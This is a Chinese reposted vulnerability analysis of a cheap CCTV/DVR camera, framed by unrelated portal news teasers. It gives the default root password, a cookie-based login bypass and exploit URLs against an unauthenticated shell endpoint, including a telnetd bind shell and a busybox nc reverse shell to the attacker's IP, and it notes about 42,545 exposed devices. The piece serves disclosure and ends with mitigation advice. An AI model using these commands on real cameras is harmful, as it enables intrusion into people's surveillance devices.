游戏电视苹果数码历史美丽
投稿投诉
美丽时装
彩妆资讯
历史明星
乐活安卓
数码常识
驾车健康
苹果问答
网络发型
电视车载
室内电影
游戏科学
音乐整形

某CCTV摄像头漏洞分析

  0x00漏洞分析
  今天看老外分析了一款廉价CCTV摄像头的文章,地址在https:www。pentestpartners。comblogpwningcctvcameras,摄像头的amazon购买地址是http:www。amazon。co。ukdpB0162AQCO4,老外曝光的漏洞主要有四个,分别是默认密码,web登陆认证绕过,内建的webshell,以及发送摄像图片到硬编码的邮箱地址,老外的文章经过我的测试,有错误和不全的地方,我都一一补充在下面了:)
  1。默认密码
  WEB默认登陆名是admin,密码是空。
  另外经过破解passwd,发现root的默认密码是juantech,可以通过telnet登录直接获取cmdshell,如图1:
  2。WEB认证绕过
  当你第一次访问的时候,index。html会要求你输入用户名和密码,输入正确,则跳转到view2。html。如果你直接访问view2。html,会被重定向到index。html,要求你输入帐户信息。下载固件用binwalk解压,如图2:
  查看view2。js,发现以下内容:(document)。ready(function(){
  dvrcamcntCookies。get(dvrcamcnt);
  dvrusrCookies。get(dvrusr);
  dvrpwdCookies。get(dvrpwd);
  if(dvrcamcntnulldvrusrnulldvrpwdnull)
  {
  location。hrefindex。html;
  }
  可以看到,如果dvrcamcnt,dvrusr,dvrpwd这3个值为空,就会跳转到index。html,所以我们只要将dvrcamcnt,dvrusr,dvrpwd设置不为空就可以了,通过查看view2。js源码可以知道,dvrcamcnt其实是控制频道(chanel)的,如下:functiongotoopenall()
  80{
  81if(dvrvieweramp;amp;dvrviewer。ConnectRTMP)
  82{
  83dvrviewer。SetPlayerNum(dvrcamcnt);
  84switch(dvrcamcnt)
  85{
  86case4:
  87dvrviewer。flSetViewDiv(4);
  88break;
  89case8:
  90dvrviewer。flSetViewDiv(9);
  91break;
  92case16:
  93dvrviewer。flSetViewDiv(16);
  94break;
  95case24:
  96dvrviewer。flSetViewDiv(25);
  97break;
  98}
  99openall(dvrcamcnt);
  100}
  101else
  102{
  103dvrviewer(viewer)〔0〕;
  104setTimeout(gotoopenall,1000);
  105}
  106}
  原文说dvrcamcnt只能设置2,4,8,24这几个值。实际测试,输入其他值都可以的。绕过登陆认证的证明如图3
  3。内建的webshell
  通过查看解压后的固件目录,我们发现dvrapp包含了web服务,使用strings查看dvrapp二进制,可以看到moo,whoami,shell,snapshot等字符,尝试访问,发现没有任何验证就可以访问这些功能,如图4,
  访问shell的时候,卡住了,把dvrapp拖入ida,查看shell功能相应的处理逻辑,因为是固件是ARM小端的架构,可以直接在IDA里F5看伪代码。如图5
  这里利用有2个方式,一个是直接telnetd绑定binsh到任意端口,然后telnet连接过去,不需要认证就可以telnet登录,这个利用方式在你不知道固件本身TELNET的账户信息的时候,是个很常见的利用方法。命令如下:http:目标ipshell?usrsbintelnetdlbinshp25
  但是实际测试还要考虑防火墙NAT的问题,好多设备仅仅映射80出来,你开通的其他端口,虽然设备打开了,但是你连接不上去。如图6。
  这时候你可以用nc反弹shell出来,估计是因为固件版本不一样,我测试的目标busybox里是自带nc的,所以通过执行http:目标ipshell?binbusyboxnc我的IP53ebinsh
  就可以获取到反弹的cmdshell了,如图7
  文章说他的固件的busybox没有带nc,所以他静态编译了一个busybox,然后通过wget下载到一个可写的目录,然后赋予busybox可执行权限,最后运行nc命令。他已经提供了编译好的busybox,可以通过http:212。111。43。161busybox来下载。
  4。发送摄像图片到硬编码的邮箱地址
  通过strings查看dvrapp二进制,还发现了另一处可疑的字符串
  。rodata:002260E00000005ACtargetlawishereyeah。netamp;subjectWhoareyou?amp;contentsamp;snapshotyesamp;vin0amp;size320180
  通过在github上搜索lawishereyeah。net,找到了https:github。comsimonjiuanipcblobmastersrccgimisc。c,通过源码可以看到defineDEFAULTUSEREMAILdvruseresee100。com
  defineDEFAULTUSERPASSWORDdvrhtml
  defineDEFAULTSMTPSERVERmail。esee100。com
  defineDEAFULTTARGEEMAILlawishereyeah。net
  hdmoore在twitter也提到这个中国邮箱,所以我略微的看了看。目前mail。esee100。com已经不解析了,但是esee100。com的CNMAE解析到了www。dvrskype。com。通过查询www。dvrskype。com的域名信息,可以看到域名的拥有者是caostorm163。com,如图8,注意这里ORG是广州市九安光电技术有限公司,而github的上传者也是九安光电技术的技术人员。通过图9可以看到,他会把whoami的返回信息和CCTV摄像头启动时的拍摄的照片发到lawishereyeah。net,当然现在这个SMTP发送服务器已经不存在了,也有可能是当时开发留下的测试的功能。0x01全球统计
  因为是运行的自定义的web服务器,HTTP服务器头包含明显的JAWS1。0特征,最近sans比较关注国内的漏洞扫描(https:isc。sans。eduforumsdiaryScanningforFortinetsshbackdoor20635),所以我就直接用shodan的结果了。如图10
  可以看到这款廉价的CCTV摄像头对公网开放的全球大概有42545台,最常用的端口是808080,用的最多的国家是土耳其,印度,越南。:)
  目前应该也有对这个CCTV摄像头的自动化恶意利用了,通过查看几个,发现几台设备的进程里都包含1560root620S。dropbearp15081rtmpdropbeardropbearrsaho
  以及wget远程下载恶意利用文件。0x02漏洞防护
  目前官方还没有补丁固件,建议不要对外开放8023等管理端口。0x03感谢的人
  感谢低调的张老师教我逆向知识,张老师的好和善是对我问的幼稚问题都耐心的回答,从来没烦过。
  原创文章,作者:Drops,转载自:http:www。mottoin。comtech118722。html

上市10年负债157亿,破产后抱吉利大腿,重庆首富也不过如此引言万达的巨大蓝图也瞬间崩塌,王健林将资产重组,抛售了万达广场的大部分产业清偿债务。而自己的儿子王思聪也成为老赖被新闻大肆报道。还有前段时间被种种负面新闻困扰的恒大集团,……性价比好用的无线蓝牙耳机,玩游戏必备酷狗X5蓝牙耳机酷狗X5充电口位于便携充电盒的背面。采用主流的microUSB接口,适用于大多数手机充电器的充电。只要将耳机放入充电盒,即可为耳机充电。酷狗X5无线蓝牙耳……从陆奇离职来看,中国职场人都是戏精离职这个事情说大也大,说小也小。往大了说,你看陆奇离职,一下子百度市值蒸发了137亿美金,妥妥的快上千亿人民币;说小也小,铁打铁打的营盘流水的兵,从百度离职的人多了去,而且互联……东风悦达起亚股比存疑,前景难料从华晨宝马到大众江淮,从广汽菲克到北汽奔驰。不管是已官宣还是博弈中,自2022年合资股比放开消息落地,中外合资双方的股比之争的战火便已燃起,而这一次烧到了东风悦达起亚。……你知道吗?用知识产权实缴注册资本,原来好处这么多相信很多企业都有过一个难以解决的烦恼,就是究竟如何才能减少企业所得税,缩减公司支出。目前顺应政府政策能够减少企业所得税的方法有:1。认定高新技术企业2。用知识……资讯丨知识产权拥有量大幅增长,我国成为知识产权大国2020年4月23日,国务院新闻办公室举行新闻发布会,介绍2019年中国知识产权发展状况,并答记者问。国家知识产权局局长申长雨介绍,2008年《国家知识产权战略纲要》颁布……OnexPlayer壹号游戏掌机新品发布会将于5月18日下午由壹号本举办的OnexPlayer壹号游戏掌机新品发布会将于5月18日下午14点30分在深圳腾讯大厦举行。此次发布会以随时乐享,我的时刻为主题,将为大家重磅呈现壹号本全新……与其贫守相濡以沫,不如贵得相知相伴最早认识相濡以沫这个词,被它所设的两人不论在什么样困难的环境中,都能够相互支持、关心帮助语境中的道义精神所感动,曾经希望可以和伴侣携手共渡人生各种关卡。相濡以沫后来……房企暴雷,险资抄底冒险还是稳赚?行业下行,房企不断爆出债务危机,为何仍有险资愿意冒险加仓?险资与地产的组合,利润到底有多大?本文由无冕财经(wumiancaijing)原创首发作者:方斯嘉编……音响领域之飞利浦可能谈到飞利浦,大多数音响商都不会太反感。毕竟飞利浦在国人心目中一直也是做着良心产品。涉及领域方方面面。再聊到飞利浦音响,可能做民品的会侧重考虑。毕竟品牌知名度高,民品的……当当阅读器,比kindle更快的阅读器阅读一本书有很多种方式,电子阅读器的出现改变了现代人的阅读方式以及阅读习惯。和纸书相比,电子阅读器轻便且能储存上千本书,和IPAD和手机相比,电子阅读器更能还原纸书的阅读体验。……决策参考小红书启动新融资中国移动拟募资560亿1、流媒体Disney付费用户数达1。16亿同比增长近一倍事件:8月13日,据报道,迪士尼公布的第三财季财报显示:迪士尼第三财季获得营收170亿美元,同比增长45;利润为……
良心种草今年双十一这个投影仪的羊毛最值得薅年年双十一少不了一通血拼,这种一年一度省qian薅羊毛的重要日子,不整点好东西分享都不厚道。科技改变生活,现在的年轻人已经逐渐脱离了看电视的队伍,开始捣鼓起了家电新宠智能……云计算如何赋能酒店行业智慧升级?近年来,酒店的竞争将主要在智能化、个性化、信息化方面展开,智慧酒店正悄然兴起。智慧酒店注重科技研发,依托现代化核心技术,提升酒店的档次和管理水平。酒店加入科技元素,给用户带来全……10天后!今年的GoogleIO开发者大会有哪些看点?2021年全球GoogleIO开发者大会将于北京时间5月18日凌晨01:00开幕,于20日结束,为期共3天。由于受全球的疫情影响,今年的GoogleIO开发者大会将于线上举办(……ASIC新规生效,FXCM福汇向非澳洲客户提供账户转移服务知名零售外汇及差价合约经纪商福汇集团澳大利亚公司(FXCMAU)已向其客户提供了有关ASIC产品干预的最新信息,并向非澳大利亚客户提供转移账户至百慕达注册的离岸子公司FXCMM……计算机组成原理数值所能表示的范围和浮点数的运算文章目录数值范围表定点整数定点小数浮点数浮点数的表示运算过程浮点数的特点浮点数的范围数值范围表上面这张表是不用硬记的,下面方法告诉你这么记定点整数小数点是固定的,固……Windows11真的来了,版本号21H2,预计RTM正式版据可靠消息,近日微软发布了Windows11InsiderPreviewBuild22000。100。之前流出的是Dev版,即开发版,面向广大开发者,Bug比较多。现在,微软通……开发区块链游戏务必注意切勿跨越政策红线自从区块链游戏出现后,许多的游戏企业也开始按耐不住了,由于区块链自身这类数字货币的方法是尤其合适于游戏。有很多游戏企业都在下手去开发自身的区块链游戏,有的一些大企业乃至在……天文爱好者发现,又有个大家伙刚刚撞在了木星上可怜的木星。它只是在那里闲逛,作为一个气体巨人,照管着特洛伊木马,专注于自己的事情。然后,轰的一声发生了爆炸,又被散落的太空岩石击中。上图:图中的高光点即为爆炸点。……企业数字化转型之低代码平台5大优势文章来源:银弹谷在低代码开发逐渐火热的市场下,把传统企业运维和企业数字化转型系上了一根无形的腰带,企业数字化转型已经成为大势所趋,那为什么要选择低代码开发平台?下面列举了……艾创米智能锁选购产品与服务哪个更重要?随着人工智能、物联网技术的不断发展,近几年来,智能家居开始逐步被广大消费者接受,正在加速的走进大家的生活。而智能门锁作为智能家居的入门单品,也备受关注。不仅仅可以消除携带钥匙带……推动中国传统体育竞技走进奥运,比亚迪助力龙舟入奥8月11日,比亚迪与中国皮划艇协会在深圳签约,成为龙舟入奥战略合作伙伴,双方将在推动龙舟进入奥运会和设计研发竞技型龙舟等诸多领域展开深度合作。中国皮划艇协会主席刘爱杰,雅典和北……世界上另一个中国,当地人说汉语使用人民币,采用人教版教材另一个中国吗?有一个地方的人们说话都用汉语消费,用人民币学校用的书都是用汉语写的,即使是国内的新闻广播也用同样的中国音调发生,他们热爱中国文化,因此,中国人来到这里都会感到奇怪……
友情链接:易事利快生活快传网聚热点七猫云快好知快百科中准网快好找文好找中准网快软网